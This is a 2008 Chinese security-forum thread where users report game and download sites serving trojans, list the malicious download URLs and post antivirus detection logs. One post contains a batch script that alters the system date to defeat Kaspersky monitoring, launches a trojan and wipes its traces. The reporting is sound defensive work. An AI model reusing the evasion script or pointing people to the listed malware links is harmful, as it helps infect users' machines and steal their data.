伤心太平洋站，中国油漆站，西安游戏中心站

流清泉

伤心太平洋
http://www.kinkm.cn/
页面很漂亮，但里面所有的下载，全是这个
http://222.180.36.174/setup.exe

中国油漆站（有油漆吗？）
http://ppkadingche.com/index.htm
里面所有下载是这个
http://222.180.37.160/down_sotp.exe
http://222.180.37.148/14564_setup.exe

西安游戏中心
http://www.xangame.com/
里面所有的下载是
http://www.xangame.com/2007128.exe

[ 本帖最后由 流清泉 于 2008-3-18 14:01 编辑 ]

流清泉

鸽子
http://116.242.89.226/sygj.exe
http://ssta.vicp.cc/0dayqb.rar
http://p.thec.cn/tiancai647/heifangVIP2008.rar
http://xiaoxuege.2255.cc/shuaqq.exe

[ 本帖最后由 流清泉 于 2008-3-18 17:11 编辑 ]

挪威的冬天

setup 被无视

病毒        2008-03-18  11:54:52        病毒在文件D:\Temporary Internet Files\Internet 临时文件\Content.IE5\W3IIB9AM\sygj[1].exe中        Win32.Parite.a.6958        处理成功（操作：清除）        

病毒 2008-03-18  11:56:07 病毒在文件D:\Desktop\sygj\1.exe中 Win32.Hack.Huigezi.cz 处理成功（操作：删除）


sygj 中其他部分未报


病毒 2008-03-18  20:59:56 病毒在文件D:\Temporary Internet Files\Internet 临时文件\Content.IE5\IO3WCCLS\shuaqq[1].exe中 Win32.VirInstaller.BindFile.b.188416 拦截成功（文件被禁止访问）

[ 本帖最后由 挪威的冬天 于 2008-3-18 21:00 编辑 ]

挪威的冬天

::======修改系统时间使卡巴监控失效============
set date=%date%                            这句是关键 破卡巴查杀的 程序流（没这句被杀）  

date 2007-12-12

date 2007-12-12

::========倒计时等待15秒======================  
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End

::===========倒计时等待结束后运行木马=============
:Next
%systemroot%\temp\1.exe  这个是你木马的名称

for %%f in (%temp%.\tmp$$$.vbs*) do del %%f

::======恢复时间(卡巴监控)=======================
date 2008-01-10        aaa
date %date%         aaa

::=========清除痕迹============================
RD /S /Q %systemroot%\temp\

挪威的冬天

执行 setup 后

病毒        2008-03-18  11:58:10        病毒在文件D:\Sandbox\挪威的冬天\VirusTest\drive\C\Windows\system32\lcpq7lwlo.dll中        Win32.Troj.HmirT.yy.172032        处理成功（操作：删除）       
病毒        2008-03-18  11:58:05        病毒在文件D:\Sandbox\挪威的冬天\VirusTest\drive\C\Windows\system32\drivers\7g73ilnjb.sys中        Win32.Troj.HiderT.lf.25600        处理成功（操作：删除）       
病毒        2008-03-18  11:57:26        病毒在文件D:\Sandbox\挪威的冬天\VirusTest\drive\C\Program Files\Microsoft Office\SYSTEM\09.exe中        Win32.Troj.Undef.143360        处理成功（操作：删除）       
病毒        2008-03-18  11:57:26        病毒在文件D:\Sandbox\挪威的冬天\VirusTest\drive\C\Program Files\Microsoft Office\SYSTEM\02.exe中        Win32.Troj.Undef.143360        处理成功（操作：删除）

mofunzone

Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\sygj.exe'
C:\TDDOWNLOAD\
  sygj.exe
      [DETECTION] Contains code of the Windows virus W32/Parite
      [NOTE]      The file was deleted!
Begin scan in 'C:\TDDOWNLOAD\setup.exe'
C:\TDDOWNLOAD\
  setup.exe
      [DETECTION] Is the Trojan horse TR/PSW.LdPinch.jm1
      [NOTE]      The file was deleted!

tanlimo

都不让下啊











[ 本帖最后由 tanlimo 于 2008-3-18 15:21 编辑 ]

啊弥陀佛

木马名称:未知木马
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\14564_SETUP.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

sjducker

Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:  http://www.xangame.com/2007128.exe
Information:  Is the Trojan horse TR/Downloader.Gen  


--------------------------------------------------------------------------------
Generated by AntiVir WebGuard 8.0.10.0, AVE 8.1.0.18, VDF 7.0.3.42

wangjay1980

全灭